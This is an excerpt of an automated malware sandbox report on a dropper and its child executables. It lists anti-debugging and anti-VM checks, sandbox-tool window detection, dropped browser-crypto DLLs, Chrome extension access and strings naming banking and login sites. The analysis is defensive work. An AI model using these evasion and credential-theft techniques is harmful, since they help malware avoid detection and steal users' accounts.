Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 882F8F second address: 882FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FFAEC5267DEh 0x0000000f jmp 00007FFAEC5267DBh 0x00000014 pushad 0x00000015 jmp 00007FFAEC5267DFh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 88312D second address: 88314B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAEC5291B4h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 88314B second address: 883153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 883153 second address: 883159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 885387 second address: 885391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFAEC5267D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	RDTSC instruction interceptor: First address: 885FE8 second address: 886007 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007FFAEC5291AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Special instruction interceptor: First address: 4A4A9A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Special instruction interceptor: First address: 2FB3EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Special instruction interceptor: First address: 4CD9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Special instruction interceptor: First address: 2FD77E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Special instruction interceptor: First address: 52FDFC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Special instruction interceptor: First address: 6DFA39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Special instruction interceptor: First address: 6DFB61 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Special instruction interceptor: First address: 87CB6F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Special instruction interceptor: First address: 8FCCED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Special instruction interceptor: First address: 8BEF01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Special instruction interceptor: First address: A815CB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 61EF01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7E15CB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Special instruction interceptor: First address: 8C5879 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Special instruction interceptor: First address: 8C5918 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Special instruction interceptor: First address: A78393 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Special instruction interceptor: First address: A76ED1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Special instruction interceptor: First address: AA3AF0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Special instruction interceptor: First address: EE914 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Special instruction interceptor: First address: 2BC729 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Special instruction interceptor: First address: 321722 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Special instruction interceptor: First address: 293F20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Special instruction interceptor: First address: 3D193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Special instruction interceptor: First address: 57825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Special instruction interceptor: First address: 584A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Special instruction interceptor: First address: 60B5AD instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Memory allocated: 5450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Memory allocated: 55F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Memory allocated: 75F0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

Code function: 10_2_04D9048F rdtsc

10_2_04D9048F

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe TID: 7932	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe TID: 5888	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe TID: 4092	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe TID: 4620	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5908	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8000	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5828	Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5828	Thread sleep time: -5190000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3320	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5828	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe TID: 1516	Thread sleep time: -180000s >= -30000s

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CBFEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

9_2_6CBFEBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior

Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: JKEGIDGD.9.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882410159.000000000085C000.00000040.00000001.01000000.00000006.sdmp, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, 0000000A.00000002.1557437845.0000000000A3E000.00000080.00000001.01000000.00000007.sdmp, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, 0000000A.00000000.1496569343.0000000000A3C000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 0000000C.00000002.1600827421.000000000079E000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000C.00000000.1534033854.000000000079C000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000D.00000002.1600829351.000000000079E000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000D.00000000.1536688940.000000000079C000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000018.00000002.2529159002.000000000079E000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000018.00000000.2151387991.000000000079C000.00000080.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JKEGIDGD.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: JKEGIDGD.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: JKEGIDGD.9.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: L8ChrKrbqV.exe, 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1396974908.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299159671.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479834944.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1423527819.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1398083017.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1386517009.0000000001134000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: L8ChrKrbqV.exe, 00000000.00000003.1386911900.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1288100681.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1396974908.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1469372574.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1299159671.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1479834944.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1423527819.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1398083017.0000000001134000.00000004.00000020.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1386517009.0000000001134000.00000004.00000020.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001297000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JKEGIDGD.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: JKEGIDGD.9.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: JKEGIDGD.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: JKEGIDGD.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: ab13ed0cb0.exe, 0000001B.00000002.2533308319.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: JKEGIDGD.9.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: cab7dbccac.exe, 0000001A.00000003.2448343833.0000000005475000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: d40ec5ca11.exe, 00000019.00000003.2395373663.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2428062761.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: cab7dbccac.exe, 0000001A.00000002.2532156050.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[
Source: JKEGIDGD.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: JKEGIDGD.9.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JKEGIDGD.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: JKEGIDGD.9.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, 0000000A.00000002.1557437845.0000000000A3E000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 0000000C.00000002.1600827421.000000000079E000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000D.00000002.1600829351.000000000079E000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000018.00000002.2529159002.000000000079E000.00000080.00000001.01000000.0000000A.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the d
Source: JKEGIDGD.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: d40ec5ca11.exe, 00000019.00000002.2425031443.0000000000A5C000.00000080.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseSe
Source: JKEGIDGD.9.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: JKEGIDGD.9.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001297000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}
Source: JKEGIDGD.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: JKEGIDGD.9.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1882410159.000000000085C000.00000040.00000001.01000000.00000006.sdmp, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe, 0000000A.00000000.1496569343.0000000000A3C000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 0000000C.00000000.1534033854.000000000079C000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000D.00000000.1536688940.000000000079C000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000018.00000000.2151387991.000000000079C000.00000080.00000001.01000000.0000000A.sdmp, d40ec5ca11.exe, 00000019.00000000.2278843439.0000000000A5A000.00000080.00000001.01000000.0000000F.sdmp, cab7dbccac.exe, 0000001A.00000002.2526452012.0000000000275000.00000040.00000001.01000000.00000010.sdmp, ab13ed0cb0.exe, 0000001B.00000002.2526454168.000000000055B000.00000040.00000001.01000000.00000011.sdmp, NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr, skotes.exe.10.dr	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: JKEGIDGD.9.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: JKEGIDGD.9.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
